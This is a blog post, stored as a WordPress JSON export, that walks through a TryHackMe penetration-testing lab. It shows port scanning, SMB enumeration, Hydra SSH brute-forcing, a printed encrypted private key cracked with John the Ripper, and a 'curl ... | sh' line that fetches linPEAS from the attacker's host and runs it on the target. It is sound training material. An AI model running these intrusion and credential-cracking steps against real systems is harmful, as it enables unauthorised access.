{"id":205,"date":"2023-04-10T23:09:28","date_gmt":"2023-04-11T04:09:28","guid":{"rendered":"https:\/\/binaryblisters.com\/?p=205"},"modified":"2023-04-14T15:34:16","modified_gmt":"2023-04-14T20:34:16","slug":"thm-basic-penetration-testing","status":"publish","type":"post","link":"https:\/\/binaryblisters.com\/?p=205","title":{"rendered":"Try Hack Me- Basic Penetration Testing"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"245\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1024x245.png\" alt=\"\" class=\"wp-image-206\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1024x245.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-300x72.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-768x183.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1536x367.png 1536w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-2048x489.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I decided to start working on some of THM&#8217;s machines. I did the <a href=\"https:\/\/binaryblisters.com\/?p=164\">Pickle Rick Machine<\/a> a little while ago which was fun so I figured I would give the other ones a shot. What better way than to start with the first and easiest (supposedly)? Overall, it was good. It makes me realize I still have a lot to learn but practice makes perfect.<\/p>\n\n\n\n<p>Here is the link to my <a href=\"https:\/\/sgtdiddlywink.gitbook.io\/thm\/\">original notes<\/a> for the labs in case anyone is interested in my thought process. This write-up will be more of a straightforward approach to how I tackled the lab. 
<\/p>\n\n\n\n<p>So let&#8217;s get started.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 1: Discover what services are running on the machine.<\/h2>\n\n\n\n<p>The first step is pretty easy: just run a simple nmap scan.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap &#91;Target URL]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"697\" height=\"333\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11.png\" alt=\"\" class=\"wp-image-207\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11.png 697w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11-300x143.png 300w\" sizes=\"auto, (max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Task 2: What is the name of the hidden directory on the web server?<\/h2>\n\n\n\n<p>Port 80 being open is usually an indicator that a web server is running. Visiting the URL takes us to an &#8220;Under Construction&#8221; webpage. Let&#8217;s run a gobuster enumeration on the page to try to discover some other directories.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/&#91;Target_IP]:&#91;Port]\/ -w &#91;Path to word list]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"882\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12.png\" alt=\"\" class=\"wp-image-208\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12.png 981w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12-300x270.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12-768x690.png 768w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/figure>\n\n\n\n<p>The &#8220;<strong>\/index<\/strong>&#8221; page is just the home page that is under construction. 
The other directories return a 403 status code, which means access to them is forbidden. That leaves us with one directory: &#8220;<strong>\/development<\/strong>&#8221;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"995\" height=\"366\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13.png\" alt=\"\" class=\"wp-image-209\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13.png 995w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13-300x110.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13-768x283.png 768w\" sizes=\"auto, (max-width: 995px) 100vw, 995px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Task 3: Use Brute forcing to find the username and password.<\/h2>\n\n\n\n<p>So I didn&#8217;t brute force the usernames. Since I had access to quite a few files from the directory we found above and some other services from the nmap scan, I decided to do some snooping.<\/p>\n\n\n\n<p>I started by exploring the two files from the directory above.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"312\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-1024x312.png\" alt=\"\" class=\"wp-image-210\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-1024x312.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-300x91.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-768x234.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14.png 1109w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"268\" 
src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-1024x268.png\" alt=\"\" class=\"wp-image-211\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-1024x268.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-300x79.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-768x201.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15.png 1100w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Three useful bits of information.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There are two possible usernames that start with J &amp; K.<\/li>\n\n\n\n<li>SMB has been configured. This lines up with the service running on Port 445 from the scan above.<\/li>\n\n\n\n<li>User &#8220;J&#8221; has weak credentials. A good indication of which user we are going to try brute forcing.<\/li>\n<\/ul>\n\n\n\n<p>Let&#8217;s start with exploring SMB on Port 445.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient -L &#91;Target URL]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"207\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16.png\" alt=\"\" class=\"wp-image-212\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16.png 878w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16-300x71.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16-768x181.png 768w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/figure>\n\n\n\n<p>It shows that an Anonymous Share is available. 
Let&#8217;s take a look in there, as this share tends to be available without credentials.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient \/\/&#91;Target URL]\/Anonymous<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"248\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17.png\" alt=\"\" class=\"wp-image-213\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17.png 790w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17-300x94.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17-768x241.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<p>It looks like there is a file in there that we can grab and take a look at.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>get staff.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"938\" height=\"179\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18.png\" alt=\"\" class=\"wp-image-214\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18.png 938w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18-300x57.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18-768x147.png 768w\" sizes=\"auto, (max-width: 938px) 100vw, 938px\" \/><\/figure>\n\n\n\n<p>If we &#8220;cat&#8221; this file out, it gives us the first bit of information we were looking for: two names, &#8220;<strong>Jan<\/strong>&#8221; and &#8220;<strong>Kay<\/strong>&#8221;.<\/p>\n\n\n\n<p>For the time being, let&#8217;s assume that these are possible usernames on the system.<\/p>\n\n\n\n<p>Now that we have a couple of possible usernames, let&#8217;s see what we can do with those. Based on our first nmap scan, we found that SSH is running on Port 22. 
If these are usernames, there&#8217;s a pretty good chance that we can log in with them over Port 22.<\/p>\n\n\n\n<p>If we try logging in to SSH with Jan, we quickly find that we need a password. So let&#8217;s give our good friend Hydra a tryout. I had to look up a hint on this one. I was a little hyper-focused on the SMB server and originally forgot about Port 22. Good reminder to myself to back up sometimes and see what other possible routes I can take.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hydra -V -l jan -P &#91;password list] ssh:\/\/&#91;Target IP]<\/code><\/pre>\n\n\n\n<p>I used the rockyou password file, which was overkill and took a bit of time, but it eventually came up with a password for the user. Per the <strong>\/development<\/strong> directory word files, it appears that Jan&#8217;s credentials are pretty weak.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1001\" height=\"203\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19.png\" alt=\"\" class=\"wp-image-215\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19.png 1001w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19-300x61.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19-768x156.png 768w\" sizes=\"auto, (max-width: 1001px) 100vw, 1001px\" \/><\/figure>\n\n\n\n<p>Now we have a password of &#8220;<strong>armando<\/strong>&#8221;.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 4: What is a username?<\/h2>\n\n\n\n<p>We already figured that out in the previous task. 
<\/p>\n\n\n\n<p><strong>Jan<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 5: What is the password?<\/h2>\n\n\n\n<p>Same as before, we already figured this out in the previous task.<\/p>\n\n\n\n<p><strong>armando<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 6: What service do you use to access the server?<\/h2>\n\n\n\n<p>Luckily for us, we also figured this out in Task 3.<\/p>\n\n\n\n<p><strong>SSH<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 7: Enumerate the machine to find any versions for privilege escalation.<\/h2>\n\n\n\n<p>Before I ran any enumeration scripts, I decided to just explore myself. I really enjoy this part once I get access to a machine. It&#8217;s fun to run around a system and see what opportunities are possible.<\/p>\n\n\n\n<p>Exploring the system gave me a lot of good info, but I decided to start by focusing on Kay&#8217;s home directory. Listing out their files (including the hidden ones) turned up a lot of useful information.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"357\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20.png\" alt=\"\" class=\"wp-image-216\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20.png 679w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20-300x158.png 300w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/figure><\/div>\n\n\n<p>We can&#8217;t do a whole lot with most of this, but the important file in there is in the <strong>.ssh<\/strong> directory.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"572\" height=\"186\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21.png\" alt=\"\" class=\"wp-image-217\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21.png 572w, 
https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21-300x98.png 300w\" sizes=\"auto, (max-width: 572px) 100vw, 572px\" \/><\/figure><\/div>\n\n\n<p>It looks like Kay has both the private and public keys saved on their machine. That is a big no-no. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-----BEGIN RSA PRIVATE KEY-----\r\nProc-Type: 4,ENCRYPTED\r\nDEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75\r\n\r\nIoNb\/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ\r\no9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN\r\nXRvjw\/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX\r\nAkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN\r\nlG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU\r\nhWQJCdnb\/U+dRasu3oxqyklKU2dPseU7rlvPAqa6y+ogK\/woTbnTrkRngKqLQxMl\r\nlIWZye4yrLETfc275hzVVYh6FkLgtOfaly0bMqGIrM+eWVoXOrZPBlv8iyNTDdDE\r\n3jRjqbOGlPs01hAWKIRxUPaEr18lcZ+OlY00Vw2oNL2xKUgtQpV2jwH04yGdXbfJ\r\nLYWlXxnJJpVMhKC6a75pe4ZVxfmMt0QcK4oKO1aRGMqLFNwaPxJYV6HauUoVExN7\r\nbUpo+eLYVs5mo5tbpWDhi0NRfnGP1t6bn7Tvb77ACayGzHdLpIAqZmv\/0hwRTnrb\r\nRVhY1CUf7xGNmbmzYHzNEwMppE2i8mFSaVFCJEC3cDgn5TvQUXfh6CJJRVrhdxVy\r\nVqVjsot+CzF7mbWm5nFsTPPlOnndC6JmrUEUjeIbLzBcW6bX5s+b95eFeceWMmVe\r\nB0WhqnPtDtVtg3sFdjxp0hgGXqK4bAMBnM4chFcK7RpvCRjsKyWYVEDJMYvc87Z0\r\nysvOpVn9WnFOUdON+U4pYP6PmNU4Zd2QekNIWYEXZIZMyypuGCFdA0SARf6\/kKwG\r\noHOACCK3ihAQKKbO+SflgXBaHXb6k0ocMQAWIOxYJunPKN8bzzlQLJs1JrZXibhl\r\nVaPeV7X25NaUyu5u4bgtFhb\/f8aBKbel4XlWR+4HxbotpJx6RVByEPZ\/kViOq3S1\r\nGpwHSRZon320xA4hOPkcG66JDyHlS6B328uViI6Da6frYiOnA4TEjJTPO5RpcSEK\r\nQKIg65gICbpcWj1U4I9mEHZeHc0r2lyufZbnfYUr0qCVo8+mS8X75seeoNz8auQL\r\n4DI4IXITq5saCHP4y\/ntmz1A3Q0FNjZXAqdFK\/hTAdhMQ5diGXnNw3tbmD8wGveG\r\nVfNSaExXeZA39jOgm3VboN6cAXpz124Kj0bEwzxCBzWKi0CPHFLYuMoDeLqP\/NIk\r\noSXloJc8aZemIl5RAH5gDCLT4k67wei9j\/JQ6zLUT0vSmLono1IiFdsMO4nUnyJ3\r\nz+3XTDtZoUl5NiY4JjCPLhTNNjAlqnpcOaqad7gV3RD\/asml2L2kB0UT8PrTtt+S\r\nbaXKPFH0dHmownGmDatJP+eMrc6S896+HAXvcvPxlKNtI7+jsNTwuPB
CNtSFvo19\r\nl9+xxd55YTVo1Y8RMwjopzx7h8oRt7U+Y9N\/BVtbt+XzmYLnu+3qOq4W2qOynM2P\r\nnZjVPpeh+8DBoucB5bfXsiSkNxNYsCED4lspxUE4uMS3yXBpZ\/44SyY8KEzrAzaI\r\nfn2nnjwQ1U2FaJwNtMN5OIshONDEABf9Ilaq46LSGpMRahNNXwzozh+\/LGFQmGjI\r\nI\/zN\/2KspUeW\/5mqWwvFiK8QU38m7M+mli5ZX76snfJE9suva3ehHP2AeN5hWDMw\r\nX+CuDSIXPo10RDX+OmmoExMQn5xc3LVtZ1RKNqono7fA21CzuCmXI2j\/LtmYwZEL\r\nOScgwNTLqpB6SfLDj5cFA5cdZLaXL1t7XDRzWggSnCt+6CxszEndyUOlri9EZ8XX\r\noHhZ45rgACPHcdWcrKCBfOQS01hJq9nSJe2W403lJmsx\/U3YLauUaVgrHkFoejnx\r\nCNpUtuhHcVQssR9cUi5it5toZ+iiDfLoyb+f82Y0wN5Tb6PTd\/onVDtskIlfE731\r\nDwOy3Zfl0l1FL6ag0iVwTrPBl1GGQoXf4wMbwv9bDF0Zp\/6uatViV1dHeqPD8Otj\r\nVxfx9bkDezp2Ql2yohUeKBDu+7dYU9k5Ng0SQAk7JJeokD7\/m5i8cFwq\/g5VQa8r\r\nsGsOxQ5Mr3mKf1n\/w6PnBWXYh7n2lL36ZNFacO1V6szMaa8\/489apbbjpxhutQNu\r\nEu\/lP8xQlxmmpvPsDACMtqA1IpoVl9m+a+sTRE2EyT8hZIRMiuaaoTZIV4CHuY6Q\r\n3QP52kfZzjBt3ciN2AmYv205ENIJvrsacPi3PZRNlJsbGxmxOkVXdvPC5mR\/pnIv\r\nwrrVsgJQJoTpFRShHjQ3qSoJ\/r\/8\/D1VCVtD4UsFZ+j1y9kXKLaT\/oK491zK8nwG\r\nURUvqvBhDS7cq8C5rFGJUYD79guGh3He5Y7bl+mdXKNZLMlzOnauC5bKV4i+Yuj7\r\nAGIExXRIJXlwF4G0bsl5vbydM55XlnBRyof62ucYS9ecrAr4NGMggcXfYYncxMyK\r\nAXDKwSwwwf\/yHEwX8ggTESv5Ad+BxdeMoiAk8c1Yy1tzwdaMZSnOSyHXuVlB4Jn5\r\nphQL3R8OrZETsuXxfDVKrPeaOKEE1vhEVZQXVSOHGCuiDYkCA6al6WYdI9i2+uNR\r\nogjvVVBVVZIBH+w5YJhYtrInQ7DMqAyX1YB2pmC+leRgF3yrP9a2kLAaDk9dBQcV\r\nev6cTcfzhBhyVqml1WqwDUZtROTwfl80jo8QDlq+HE0bvCB\/o2FxQKYEtgfH4\/UC\r\nD5qrsHAK15DnhH4IXrIkPlA799CXrhWi7mF5Ji41F3O7iAEjwKh6Q\/YjgPvgj8LG\r\nOsCP\/iugxt7u+91J7qov\/RBTrO7GeyX5Lc\/SW1j6T6sjKEga8m9fS10h4TErePkT\r\nt\/CCVLBkM22Ewao8glguHN5VtaNH0mTLnpjfNLVJCDHl0hKzi3zZmdrxhql+\/WJQ\r\n4eaCAHk1hUL3eseN3ZpQWRnDGAAPxH+LgPyE8Sz1it8aPuP8gZABUFjBbEFMwNYB\r\ne5ofsDLuIOhCVzsw\/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC\r\n3Jt1\/ZW3XCb76R75sG5h6Q4N8gu5c\/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY\r\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n\n\n\n<p>Here is where I learned that I can log into SSH with a private key which is really cool. 
I started by creating a new file on my host machine.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nano id_rsa.pem<\/code><\/pre>\n\n\n\n<p>I copied and pasted the private key into this file, saved it, and exited. Next, I tried logging into the SSH server with the private key.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i id_rsa.pem kay@&#91;Target IP]<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"466\" height=\"145\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22.png\" alt=\"\" class=\"wp-image-218\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22.png 466w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22-300x93.png 300w\" sizes=\"auto, (max-width: 466px) 100vw, 466px\" \/><\/figure><\/div>\n\n\n<p>Unfortunately, it looks like I need a passphrase to continue logging in. This is great information and we&#8217;ll come back to it later, but for now let&#8217;s get back to the task at hand: enumerating the machine.<\/p>\n\n\n\n<p>Start by downloading <a href=\"https:\/\/github.com\/carlospolop\/PEASS-ng\/tree\/master\/linPEAS\">linPEAS<\/a> if you don&#8217;t already have it installed.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wget \"https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh\" -O linpeas.sh<\/code><\/pre>\n\n\n\n<p>This will download the file and save the output to <strong>linpeas.sh<\/strong>. 
Next, start up a Python web server from the directory that you downloaded linPEAS to on your host machine.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo python3 -m http.server 80<\/code><\/pre>\n\n\n\n<p>On the target machine (ensure you are currently SSH&#8217;d into Jan&#8217;s account), run the following:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl &#91;Host IP]\/linpeas.sh | sh<\/code><\/pre>\n\n\n\n<p>This will grab the <strong>linpeas.sh<\/strong> file from your web server and run it on the target machine. It outputs a ton of good information in an easy-to-read format. This is where I discovered a vulnerability in the machine (CVE-2021-4034), and it also output the private keys I previously discovered.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 8: What is the name of the other user?<\/h2>\n\n\n\n<p>This should be pretty easy since we already discovered this in a previous task.<\/p>\n\n\n\n<p><strong>Kay<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 9: If you found this user, what can you do with this information?<\/h2>\n\n\n\n<p>Well honestly, a lot. But I think they are getting at lateral movement in the system. In this case, Kay has a lot of root-level privileges, so it would be worth trying to gain access to their account.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 10: What is the final password you obtain?<\/h2>\n\n\n\n<p>Let&#8217;s jump back to <strong>Task 7<\/strong> from above. <\/p>\n\n\n\n<p>I needed my second hint here as I had no idea what to do about the passphrase to Kay&#8217;s account. I spent a couple of hours but was looking in all the wrong places. Turns out our buddy <a href=\"https:\/\/github.com\/openwall\/john\">John<\/a> (not <a href=\"https:\/\/www.youtube.com\/channel\/UCVeW9qkBjo3zosnqUbG7CFw\">John Hammond<\/a>) is here to help us out.<\/p>\n\n\n\n<p>I learned that we can actually obtain the passphrase from the private key, provided the passphrase is something relatively simple. 
To do this, we will use <a href=\"https:\/\/github.com\/openwall\/john\">John the Ripper<\/a>. The first step is to convert the private key file from above, <strong>id_rsa.pem<\/strong>, to a format that John can try to crack.<\/p>\n\n\n\n<p>Start by downloading <strong><a href=\"https:\/\/github.com\/openwall\/john\/blob\/bleeding-jumbo\/run\/ssh2john.py\">ssh2john.py<\/a><\/strong> to your host machine if you don&#8217;t already have it.<\/p>\n\n\n\n<p>Next, run the <strong>id_rsa.pem<\/strong> file through the Python script.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 &#91;File path to ssh2john.py] &#91;File path to id_rsa.pem] > john.txt<\/code><\/pre>\n\n\n\n<p>This will output a new file called &#8220;<strong>john.txt<\/strong>&#8221; which John the Ripper can read and try to extract a passphrase from.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>john &#91;Path to the john.txt file] --wordlist=&#91;Path to wordlist you want to use]<\/code><\/pre>\n\n\n\n<p>Running this through John the Ripper will output the passphrase &#8220;<strong>beeswax<\/strong>&#8221; at the end. Let&#8217;s give that a try now.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i &#91;Path to private key] kay@&#91;Target IP]<\/code><\/pre>\n\n\n\n<p>When prompted for the passphrase, input <strong>beeswax<\/strong> and you should now be logged into Kay&#8217;s account.<\/p>\n\n\n\n<p>Stroll on over to Kay&#8217;s home directory and cat the backup file:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/home\/kay\/pass.bak<\/code><\/pre>\n\n\n\n<p>This will output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>heresareallystrongpasswordthatfollowsthepasswordpolicy$$<\/code><\/pre>\n\n\n\n<p>And that is it. Nothing more to it.<\/p>\n\n\n\n<p>I needed two hints to get through this lab but, as everyone says, practice makes perfect. 
I&#8217;ll try taking a crack at another lab tomorrow and will follow up with a write-up a day or two afterward so keep your eyes open for it.<\/p>\n\n\n\n<p>As always, thanks for reading and catch you all later.<\/p>\n\n\n\n<p>-sgtdiddlywink<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I decided to start working on some of THM&#8217;s machines. I did the Pickle Rick Machine a little while ago which was fun so I figured I would give the other ones a shot. What better way than to start with the first and easiest (supposedly)? Overall, it was good. It makes me realize I [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":219,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,49],"tags":[63,18,65,62,64,61,60,51],"class_list":["post-205","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-thm","tag-gobuster","tag-hacking","tag-hydra","tag-john-the-ripper","tag-nmap","tag-smb","tag-ssh","tag-thm"],"_links":{"self":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=205"}],"version-history":[{"count":2,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205\/revisions"}],"predecessor-version":[{"id":255,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205\/revisions\/255"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/media\/21
9"}],"wp:attachment":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}